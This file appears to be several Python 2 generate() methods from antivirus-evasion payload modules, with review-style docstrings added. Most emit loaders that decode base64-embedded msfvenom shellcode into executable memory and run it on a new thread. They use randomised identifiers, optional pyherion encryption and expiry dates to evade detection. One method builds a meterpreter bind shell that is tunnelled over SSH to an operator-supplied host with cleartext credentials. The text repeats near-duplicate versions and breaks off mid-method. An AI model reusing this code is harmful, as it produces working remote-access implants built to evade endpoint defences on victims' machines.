    def generate(self):
        """Skeleton generate() showing the hooks a payload module uses.

        Triggers self.shellcode.generate() (its result is not used by this
        skeleton), appends helpers.randomString() to a placeholder source
        string, and passes the result through encryption.pyherion when the
        USE_PYHERION option value is "y".  Returns the resulting source.
        """
        # invoked for its side effects only; the placeholder template below
        # never embeds the generated shellcode
        self.shellcode.generate()

        # placeholder source plus a random suffix
        source = "".join(("...", helpers.randomString()))

        # only index 0 of the option entry (its value) is inspected
        wants_pyherion = self.required_options["USE_PYHERION"][0].lower() == "y"
        if wants_pyherion:
            source = encryption.pyherion(source)
        return source
    def generate(self):
        """Skeleton generate() for a payload module (lower-case option keys).

        Calls self.shellcode.generate() without using its result, builds a
        placeholder source string followed by helpers.randomString(), and
        applies encryption.pyherion to it when the use_pyherion option
        value is "y".  Returns the resulting source.
        """
        self.shellcode.generate()

        payload = "..."
        payload = payload + helpers.randomString()

        # option entries are indexed with [0] for their value
        pyherion_flag = self.required_options["use_pyherion"][0]
        if pyherion_flag.lower() != "y":
            return payload
        return encryption.pyherion(payload)
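    def generate(self):
        """Return payload source read verbatim from the python_source option.

        Calls self._validateArchitecture() (defined elsewhere in the class),
        reads the file named by required_options["python_source"] and, when
        use_pyherion is "y", passes the text through encryption.pyherion.
        Prints a warning and returns "" when the file cannot be opened or
        read (IOError).
        """
        self._validateArchitecture()

        python_source = self.required_options["python_source"][0]

        try:
            # 'with' closes the handle even when read() raises; the previous
            # open()/read()/close() sequence leaked it on a read error.
            with open(python_source, 'r') as f:
                PayloadCode = f.read()
        except IOError:
            print helpers.color("\n [!] python_source file \""+python_source+"\" not found\n", warning=True)
            return ""

        # optional pyherion wrapping, selected by the use_pyherion option value
        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = encryption.pyherion(PayloadCode)

        return PayloadCode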
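    def generate(self):
        """Return payload source read verbatim from the PYTHON_SOURCE option.

        Calls self._validateArchitecture() (defined elsewhere in the class),
        reads the file named by required_options["PYTHON_SOURCE"] and, when
        USE_PYHERION is "y", passes the text through encryption.pyherion.
        Prints a warning and returns "" when the file cannot be opened or
        read (IOError).
        """
        self._validateArchitecture()

        PYTHON_SOURCE = self.required_options["PYTHON_SOURCE"][0]

        try:
            # 'with' closes the handle even when read() raises; the previous
            # open()/read()/close() sequence leaked it on a read error.
            with open(PYTHON_SOURCE, 'r') as f:
                PayloadCode = f.read()
        except IOError:
            print helpers.color("\n [!] PYTHON_SOURCE file \""+PYTHON_SOURCE+"\" not found\n", warning=True)
            return ""

        # optional pyherion wrapping, selected by the USE_PYHERION option value
        if self.required_options["USE_PYHERION"][0].lower() == "y":
            PayloadCode = encryption.pyherion(PayloadCode)

        return PayloadCode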
    def generate(self):
        """Return Python 2 source that loads and runs the generated shellcode.

        INJECT_METHOD selects how the emitted program places the shellcode:
          "virtual" - VirtualAlloc + RtlMoveMemory + CreateThread
          "heap"    - HeapCreate/HeapAlloc + RtlMoveMemory + CreateThread
          other     - ctypes create_string_buffer cast to CFUNCTYPE(c_void_p)
        EXPIRE_PAYLOAD selects one of two variants of each: "x" emits the
        loader unconditionally; any other value is parsed with int() as a
        number of days (ValueError otherwise) and the emitted program runs
        the loader only while datetime.now() is before today + N days,
        i.e. a plain comparison against the local clock.
        The shellcode is base64-encoded into the emitted source; the emitted
        code base64-decodes it and then applies the "string_escape" codec,
        so shellcode.generate() presumably returns escaped byte text rather
        than raw bytes (the SSH-tunnel example on this page decodes its
        shellcode the same way) - confirm against the shellcode module.
        Every identifier in the emitted source comes from
        helpers.randomString().  With USE_PYHERION == "y" the finished
        source is passed through encryption.pyherion.

        NOTE(review): the six branches below are near-verbatim copies that
        differ only in the allocation calls and the tab indentation of the
        expiry variant; a fix made in one must be made in all six.  The
        emitted code is Python 2 only (str.decode('base64') and
        decode("string_escape") do not exist on Python 3).  The final
        "else" branches assign RandReverseShell but never use it, and the
        expiry variants import `date` into the emitted program without
        using it.
        """
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
                # --- virtual / never expires ---

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Base64 Encode Shellcode
                EncodedShellcode = base64.b64encode(Shellcode)

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandT = helpers.randomString()
                randctypes = helpers.randomString()

                PayloadCode = "import ctypes as " + randctypes + "\n"
                PayloadCode += "import base64\n"
                PayloadCode += RandT + ' = "' + EncodedShellcode + '"\n'
                PayloadCode += (
                    ShellcodeVariableName
                    + " = bytearray("
                    + RandT
                    + ".decode('base64','strict').decode(\"string_escape\"))\n"
                )
                # Emitted loader: RWX VirtualAlloc -> RtlMoveMemory copy ->
                # CreateThread on the buffer -> WaitForSingleObject(INFINITE).
                # This allocate-RWX / copy / start-thread sequence is the
                # textbook self-injection pattern that endpoint detection
                # heuristics key on.
                PayloadCode += (
                    RandPtr
                    + " = "
                    + randctypes
                    + ".windll.kernel32.VirtualAlloc("
                    + randctypes
                    + ".c_int(0),"
                    + randctypes
                    + ".c_int(len("
                    + ShellcodeVariableName
                    + ")),"
                    + randctypes
                    + ".c_int(0x3000),"  # MEM_COMMIT | MEM_RESERVE
                    + randctypes
                    + ".c_int(0x40))\n"  # PAGE_EXECUTE_READWRITE
                )
                PayloadCode += (
                    RandBuf
                    + " = ("
                    + randctypes
                    + ".c_char * len("
                    + ShellcodeVariableName
                    + ")).from_buffer("
                    + ShellcodeVariableName
                    + ")\n"
                )
                PayloadCode += (
                    randctypes
                    + ".windll.kernel32.RtlMoveMemory("
                    + randctypes
                    + ".c_int("
                    + RandPtr
                    + "),"
                    + RandBuf
                    + ","
                    + randctypes
                    + ".c_int(len("
                    + ShellcodeVariableName
                    + ")))\n"
                )
                PayloadCode += (
                    RandHt
                    + " = "
                    + randctypes
                    + ".windll.kernel32.CreateThread("
                    + randctypes
                    + ".c_int(0),"
                    + randctypes
                    + ".c_int(0),"
                    + randctypes
                    + ".c_int("
                    + RandPtr
                    + "),"
                    + randctypes
                    + ".c_int(0),"
                    + randctypes
                    + ".c_int(0),"
                    + randctypes
                    + ".pointer("
                    + randctypes
                    + ".c_int(0)))\n"
                )
                PayloadCode += (
                    randctypes
                    + ".windll.kernel32.WaitForSingleObject("
                    + randctypes
                    + ".c_int("
                    + RandHt
                    + "),"
                    + randctypes
                    + ".c_int(-1))\n"  # -1 as a DWORD is INFINITE
                )

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:
                # --- virtual / expires after EXPIRE_PAYLOAD days ---

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                # str(date) is "YYYY-MM-DD"; the [2:] slice below drops the
                # century so the text matches the emitted "%y-%m-%d" parse
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Base64 Encode Shellcode
                EncodedShellcode = base64.b64encode(Shellcode)

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandT = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()
                randctypes = helpers.randomString()

                PayloadCode = "import ctypes as " + randctypes + "\n"
                PayloadCode += "import base64\n"
                PayloadCode += "from datetime import datetime\n"
                PayloadCode += "from datetime import date\n\n"
                PayloadCode += RandToday + " = datetime.now()\n"
                PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
                # everything after this line is emitted one tab deep, inside
                # the `if today < expire:` body
                PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
                PayloadCode += "\t" + RandT + ' = "' + EncodedShellcode + '"\n'
                PayloadCode += (
                    "\t"
                    + ShellcodeVariableName
                    + " = bytearray("
                    + RandT
                    + ".decode('base64','strict').decode(\"string_escape\"))\n"
                )
                # same RWX VirtualAlloc / RtlMoveMemory / CreateThread loader
                # as the non-expiring variant above
                PayloadCode += (
                    "\t"
                    + RandPtr
                    + " = "
                    + randctypes
                    + ".windll.kernel32.VirtualAlloc("
                    + randctypes
                    + ".c_int(0),"
                    + randctypes
                    + ".c_int(len("
                    + ShellcodeVariableName
                    + ")),"
                    + randctypes
                    + ".c_int(0x3000),"  # MEM_COMMIT | MEM_RESERVE
                    + randctypes
                    + ".c_int(0x40))\n"  # PAGE_EXECUTE_READWRITE
                )
                PayloadCode += (
                    "\t"
                    + RandBuf
                    + " = ("
                    + randctypes
                    + ".c_char * len("
                    + ShellcodeVariableName
                    + ")).from_buffer("
                    + ShellcodeVariableName
                    + ")\n"
                )
                PayloadCode += (
                    "\t"
                    + randctypes
                    + ".windll.kernel32.RtlMoveMemory("
                    + randctypes
                    + ".c_int("
                    + RandPtr
                    + "),"
                    + RandBuf
                    + ","
                    + randctypes
                    + ".c_int(len("
                    + ShellcodeVariableName
                    + ")))\n"
                )
                PayloadCode += (
                    "\t"
                    + RandHt
                    + " = "
                    + randctypes
                    + ".windll.kernel32.CreateThread("
                    + randctypes
                    + ".c_int(0),"
                    + randctypes
                    + ".c_int(0),"
                    + randctypes
                    + ".c_int("
                    + RandPtr
                    + "),"
                    + randctypes
                    + ".c_int(0),"
                    + randctypes
                    + ".c_int(0),"
                    + randctypes
                    + ".pointer("
                    + randctypes
                    + ".c_int(0)))\n"
                )
                PayloadCode += (
                    "\t"
                    + randctypes
                    + ".windll.kernel32.WaitForSingleObject("
                    + randctypes
                    + ".c_int("
                    + RandHt
                    + "),"
                    + randctypes
                    + ".c_int(-1))\n"  # -1 as a DWORD is INFINITE
                )

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
        if self.required_options["INJECT_METHOD"][0].lower() == "heap":
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
                # --- heap / never expires ---

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Base64 Encode Shellcode
                EncodedShellcode = base64.b64encode(Shellcode)

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandT = helpers.randomString()
                HeapVar = helpers.randomString()
                randctypes = helpers.randomString()

                PayloadCode = "import ctypes as " + randctypes + "\n"
                PayloadCode += "import base64\n"
                PayloadCode += RandT + ' = "' + EncodedShellcode + '"\n'
                PayloadCode += (
                    ShellcodeVariableName
                    + " = bytearray("
                    + RandT
                    + ".decode('base64','strict').decode(\"string_escape\"))\n"
                )
                # Emitted loader: a private executable heap (HeapCreate with
                # HEAP_CREATE_ENABLE_EXECUTE) replaces the RWX VirtualAlloc;
                # the copy / CreateThread / wait tail is identical to the
                # "virtual" branches.  An executable private heap is just as
                # much of a detection signal as an RWX private allocation.
                PayloadCode += (
                    HeapVar
                    + " = "
                    + randctypes
                    + ".windll.kernel32.HeapCreate("
                    + randctypes
                    + ".c_int(0x00040000),"  # HEAP_CREATE_ENABLE_EXECUTE
                    + randctypes
                    + ".c_int(len("
                    + ShellcodeVariableName
                    + ") * 2),"  # initial heap size: twice the shellcode length
                    + randctypes
                    + ".c_int(0))\n"  # maximum size 0: growable heap
                )
                PayloadCode += (
                    RandPtr
                    + " = "
                    + randctypes
                    + ".windll.kernel32.HeapAlloc("
                    + randctypes
                    + ".c_int("
                    + HeapVar
                    + "),"
                    + randctypes
                    + ".c_int(0x00000008),"  # HEAP_ZERO_MEMORY
                    + randctypes
                    + ".c_int(len( "
                    + ShellcodeVariableName
                    + ")))\n"
                )
                PayloadCode += (
                    RandBuf
                    + " = ("
                    + randctypes
                    + ".c_char * len("
                    + ShellcodeVariableName
                    + ")).from_buffer("
                    + ShellcodeVariableName
                    + ")\n"
                )
                PayloadCode += (
                    randctypes
                    + ".windll.kernel32.RtlMoveMemory("
                    + randctypes
                    + ".c_int("
                    + RandPtr
                    + "),"
                    + RandBuf
                    + ","
                    + randctypes
                    + ".c_int(len("
                    + ShellcodeVariableName
                    + ")))\n"
                )
                PayloadCode += (
                    RandHt
                    + " = "
                    + randctypes
                    + ".windll.kernel32.CreateThread("
                    + randctypes
                    + ".c_int(0),"
                    + randctypes
                    + ".c_int(0),"
                    + randctypes
                    + ".c_int("
                    + RandPtr
                    + "),"
                    + randctypes
                    + ".c_int(0),"
                    + randctypes
                    + ".c_int(0),"
                    + randctypes
                    + ".pointer("
                    + randctypes
                    + ".c_int(0)))\n"
                )
                PayloadCode += (
                    randctypes
                    + ".windll.kernel32.WaitForSingleObject("
                    + randctypes
                    + ".c_int("
                    + RandHt
                    + "),"
                    + randctypes
                    + ".c_int(-1))\n"  # -1 as a DWORD is INFINITE
                )

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:
                # --- heap / expires after EXPIRE_PAYLOAD days ---

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                # str(date) is "YYYY-MM-DD"; the [2:] slice below drops the
                # century so the text matches the emitted "%y-%m-%d" parse
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Base64 Encode Shellcode
                EncodedShellcode = base64.b64encode(Shellcode)

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandT = helpers.randomString()
                HeapVar = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()
                randctypes = helpers.randomString()

                PayloadCode = "import ctypes as " + randctypes + "\n"
                PayloadCode += "import base64\n"
                PayloadCode += "from datetime import datetime\n"
                PayloadCode += "from datetime import date\n\n"
                PayloadCode += RandToday + " = datetime.now()\n"
                PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
                # everything after this line is emitted one tab deep, inside
                # the `if today < expire:` body
                PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
                PayloadCode += "\t" + RandT + ' = "' + EncodedShellcode + '"\n'
                PayloadCode += (
                    "\t"
                    + ShellcodeVariableName
                    + " = bytearray("
                    + RandT
                    + ".decode('base64','strict').decode(\"string_escape\"))\n"
                )
                # same executable-heap loader as the non-expiring heap variant
                PayloadCode += (
                    "\t"
                    + HeapVar
                    + " = "
                    + randctypes
                    + ".windll.kernel32.HeapCreate("
                    + randctypes
                    + ".c_int(0x00040000),"  # HEAP_CREATE_ENABLE_EXECUTE
                    + randctypes
                    + ".c_int(len("
                    + ShellcodeVariableName
                    + ") * 2),"
                    + randctypes
                    + ".c_int(0))\n"
                )
                PayloadCode += (
                    "\t"
                    + RandPtr
                    + " = "
                    + randctypes
                    + ".windll.kernel32.HeapAlloc("
                    + randctypes
                    + ".c_int("
                    + HeapVar
                    + "),"
                    + randctypes
                    + ".c_int(0x00000008),"  # HEAP_ZERO_MEMORY
                    + randctypes
                    + ".c_int(len( "
                    + ShellcodeVariableName
                    + ")))\n"
                )
                PayloadCode += (
                    "\t"
                    + RandBuf
                    + " = ("
                    + randctypes
                    + ".c_char * len("
                    + ShellcodeVariableName
                    + ")).from_buffer("
                    + ShellcodeVariableName
                    + ")\n"
                )
                PayloadCode += (
                    "\t"
                    + randctypes
                    + ".windll.kernel32.RtlMoveMemory("
                    + randctypes
                    + ".c_int("
                    + RandPtr
                    + "),"
                    + RandBuf
                    + ","
                    + randctypes
                    + ".c_int(len("
                    + ShellcodeVariableName
                    + ")))\n"
                )
                PayloadCode += (
                    "\t"
                    + RandHt
                    + " = "
                    + randctypes
                    + ".windll.kernel32.CreateThread("
                    + randctypes
                    + ".c_int(0),"
                    + randctypes
                    + ".c_int(0),"
                    + randctypes
                    + ".c_int("
                    + RandPtr
                    + "),"
                    + randctypes
                    + ".c_int(0),"
                    + randctypes
                    + ".c_int(0),"
                    + randctypes
                    + ".pointer("
                    + randctypes
                    + ".c_int(0)))\n"
                )
                PayloadCode += (
                    "\t"
                    + randctypes
                    + ".windll.kernel32.WaitForSingleObject("
                    + randctypes
                    + ".c_int("
                    + RandHt
                    + "),"
                    + randctypes
                    + ".c_int(-1))\n"  # -1 as a DWORD is INFINITE
                )

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        else:
            # --- any other INJECT_METHOD: no kernel32 calls at all ---
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()  # assigned but never used
                RandMemoryShell = helpers.randomString()
                DecodedShellcode = helpers.randomString()

                # Base64 Encode Shellcode
                EncodedShellcode = base64.b64encode(Shellcode)

                PayloadCode = "from ctypes import *\n"
                PayloadCode += "import base64\n"
                PayloadCode += ShellcodeVariableName + ' = "' + EncodedShellcode + '"\n'
                PayloadCode += (
                    DecodedShellcode
                    + " = bytearray("
                    + ShellcodeVariableName
                    + ".decode('base64','strict').decode(\"string_escape\"))\n"
                )
                # Emitted loader: the decoded bytes go into a
                # create_string_buffer, which is then cast to a
                # CFUNCTYPE(c_void_p) function pointer and called.  No memory
                # protection is changed, so this presumably targets
                # interpreters whose heap is executable - TODO confirm which
                # platforms this branch is meant for.
                PayloadCode += (
                    RandMemoryShell
                    + " = create_string_buffer(str("
                    + DecodedShellcode
                    + "), len(str("
                    + DecodedShellcode
                    + ")))\n"
                )
                PayloadCode += RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n"
                PayloadCode += RandShellcode + "()"

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                # str(date) is "YYYY-MM-DD"; the [2:] slice below drops the
                # century so the text matches the emitted "%y-%m-%d" parse
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()  # assigned but never used
                RandMemoryShell = helpers.randomString()
                DecodedShellcode = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # Base64 Encode Shellcode
                EncodedShellcode = base64.b64encode(Shellcode)

                PayloadCode = "from ctypes import *\n"
                PayloadCode += "import base64\n"
                PayloadCode += "from datetime import datetime\n"
                PayloadCode += "from datetime import date\n\n"
                PayloadCode += RandToday + " = datetime.now()\n"
                PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
                # everything after this line is emitted one tab deep, inside
                # the `if today < expire:` body
                PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
                PayloadCode += "\t" + ShellcodeVariableName + ' = "' + EncodedShellcode + '"\n'
                PayloadCode += (
                    "\t"
                    + DecodedShellcode
                    + " = bytearray("
                    + ShellcodeVariableName
                    + ".decode('base64','strict').decode(\"string_escape\"))\n"
                )
                # same create_string_buffer / cast / call loader as the
                # non-expiring variant above
                PayloadCode += (
                    "\t"
                    + RandMemoryShell
                    + " = create_string_buffer(str("
                    + DecodedShellcode
                    + "), len(str("
                    + DecodedShellcode
                    + ")))\n"
                )
                PayloadCode += "\t" + RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n"
                PayloadCode += "\t" + RandShellcode + "()"

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
	def generate(self):
		"""Return a Python 2 program that injects a bind shell and tunnels it over SSH.

		Sets the shellcode module to windows/meterpreter/bind_tcp bound to
		127.0.0.1:LPORT, then fills a fixed template with the escaped
		shellcode text and the LPORT / SSHUSER / SSHPASS / SSHOST / SSHPORT
		option values.  The emitted program starts inject() in a
		multiprocessing child (VirtualAlloc RWX + VirtualLock + RtlMoveMemory
		+ CreateThread), then connects to SSHOST:SSHPORT with paramiko and
		requests a remote port-forward of LPORT back to the local
		127.0.0.1:LPORT listener, relaying bytes with select().  When
		use_pyherion is "y" the result is passed through encryption.pyherion.

		NOTE(review): as printed here the template has four "%s" slots
		(shellcode, shellport, rhost, port) but six values are supplied, so
		the % formatting would raise TypeError; the `user = "******"` and
		`password = "******"` lines look redacted by the listing and
		presumably read "%s" in the original.  The SSH username and password
		are embedded in cleartext in the generated file, AutoAddPolicy
		accepts any unknown host key (no server verification), and both
		client.connect() and the tunnel setup swallow every exception, so
		failures are silent.  The template body is a runtime string and is
		reproduced byte-for-byte, including its tab indentation.
		"""

		self.shellcode.SetPayload(["windows/meterpreter/bind_tcp", ["LHOST=127.0.0.1", 
																	"LPORT=" + self.required_options["LPORT"][0]]])

		# escaped byte text; the template applies decode("string_escape") to it
		Shellcode = self.shellcode.generate()

		PayloadCode = """from socket import *
import paramiko
import multiprocessing
import time
import subprocess
import ctypes
import thread
import threading
import select

def inject(shellcode):
	ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
											  ctypes.c_int(len(shellcode)),
											  ctypes.c_int(0x3000),
											  ctypes.c_int(0x40))
	ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
									   ctypes.c_int(len(shellcode)))
	buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
	ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
										 buf,
										 ctypes.c_int(len(shellcode)))
	ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
											 ctypes.c_int(0),
											 ctypes.c_int(ptr),
											 ctypes.c_int(0),
											 ctypes.c_int(0),
											 ctypes.pointer(ctypes.c_int(0)))
	ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

def handler(chan, host, port):
	sock = socket()
	try:
		sock.connect((host, port))
	except Exception:
		pass
  
	while True:
		r, w, x = select.select([sock, chan], [], [])
		if sock in r:
			data = sock.recv(1024)
			if len(data) == 0:
				break
			chan.send(data)
		if chan in r:
			data = chan.recv(1024)
			if len(data) == 0:
				break
			sock.send(data)
	chan.close()
	sock.close()

def reverse_forward_tunnel(server_port, remote_host, remote_port, transport):

		transport.request_port_forward('', server_port)
		while True:
				chan = transport.accept(1000)
				if chan is None:
						continue

				thr = threading.Thread(target=handler, args=(chan, remote_host, remote_port))
				thr.setDaemon(True)
				thr.start()

def main(user,password, rhost, port, shellport):
	server = [rhost, int(port)]  
	remote = ['127.0.0.1', int(shellport)] 
	client = paramiko.SSHClient() 
	client.load_system_host_keys()
	client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

	try:
		client.connect(server[0], server[1], username=user, key_filename=None, look_for_keys=False, password=password)
	except Exception:
		pass

	try:
		reverse_forward_tunnel(int(shellport), remote[0], remote[1], client.get_transport())
	except Exception:
		pass

if __name__ == '__main__':
	multiprocessing.freeze_support()
	shellcode = r"%s"
	shellcode = shellcode.decode("string_escape")
	shellcode = bytearray(shellcode)
	shellport = "%s"
	time.sleep(2)
	p = multiprocessing.Process(target=inject, args=(shellcode,))
	jobs = []
	jobs.append(p)
	p.start()
	user = "******"
	password = "******"
	rhost = "%s"
	port = "%s"
	time.sleep(3)
	thread.start_new_thread(main,(user, password, rhost, port, shellport))""" % (Shellcode,
																				 self.required_options["LPORT"][0],
																				 self.required_options["SSHUSER"][0],
																				 self.required_options["SSHPASS"][0],
																				 self.required_options["SSHOST"][0],
																				 self.required_options["SSHPORT"][0])
		# optional pyherion wrapping, selected by the use_pyherion option value
		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = encryption.pyherion(PayloadCode)

		return PayloadCode
    def generate(self):
        """Build a Python source payload that loads base64-embedded shellcode, with an optional expiry date.

        ``INJECT_METHOD`` selects how the emitted program places the shellcode:
        "virtual" uses VirtualAlloc (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 =
        PAGE_EXECUTE_READWRITE) + RtlMoveMemory + CreateThread; "heap" uses
        HeapCreate(0x00040000 = HEAP_CREATE_ENABLE_EXECUTE) + HeapAlloc(0x00000008 =
        HEAP_ZERO_MEMORY) + RtlMoveMemory + CreateThread; anything else uses plain
        ctypes ``create_string_buffer`` cast to a ``CFUNCTYPE`` and called directly
        (no kernel32 calls).

        ``EXPIRE_PAYLOAD`` of "x" means no expiry; otherwise it is parsed as a number
        of days and the emitted program only runs its body while
        ``datetime.now()`` (the host's local clock) is before today + that many days.

        Options read from ``self.required_options``: INJECT_METHOD, EXPIRE_PAYLOAD,
        USE_PYHERION.

        Returns:
            The payload source text; passed through ``encryption.pyherion`` when
            ``USE_PYHERION`` is "y".

        Review notes:
        - The shellcode is embedded as plain base64 and decoded at runtime with the
          Python 2 'base64' and 'string_escape' codecs (a static inspection point).
        - The six branches repeat the same shellcode generation, name generation
          and option check almost verbatim; only the emitted ctypes lines differ.
        - ``RandReverseShell`` is generated but never used in the last two branches.
        - The second top-level test is ``if`` rather than ``elif``; this is harmless
          only because every "virtual" sub-branch returns.
        """
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Base64 Encode Shellcode
                EncodedShellcode = base64.b64encode(Shellcode)

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandT = helpers.randomString()

                # Emitted program: decode, copy into an RWX VirtualAlloc region,
                # run it on a new thread and wait forever (INFINITE == -1).
                PayloadCode = 'import ctypes as avlol\n'
                PayloadCode += 'import base64\n'
                PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
                PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
                PayloadCode += RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + ShellcodeVariableName + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
                PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:
                # Get our current date and add number of days to the date.
                # str(date) is "YYYY-MM-DD"; [2:] below yields "YY-MM-DD", which is
                # what the emitted strptime("%y-%m-%d") expects.
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(
                    days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Base64 Encode Shellcode
                EncodedShellcode = base64.b64encode(Shellcode)

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandT = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # Same VirtualAlloc sequence as above, indented one tab under the
                # date gate so nothing runs once the expiry date has passed.
                PayloadCode = 'import ctypes as avlol\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[
                    2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
                PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
                PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + ShellcodeVariableName + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
                PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += '\t' + 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
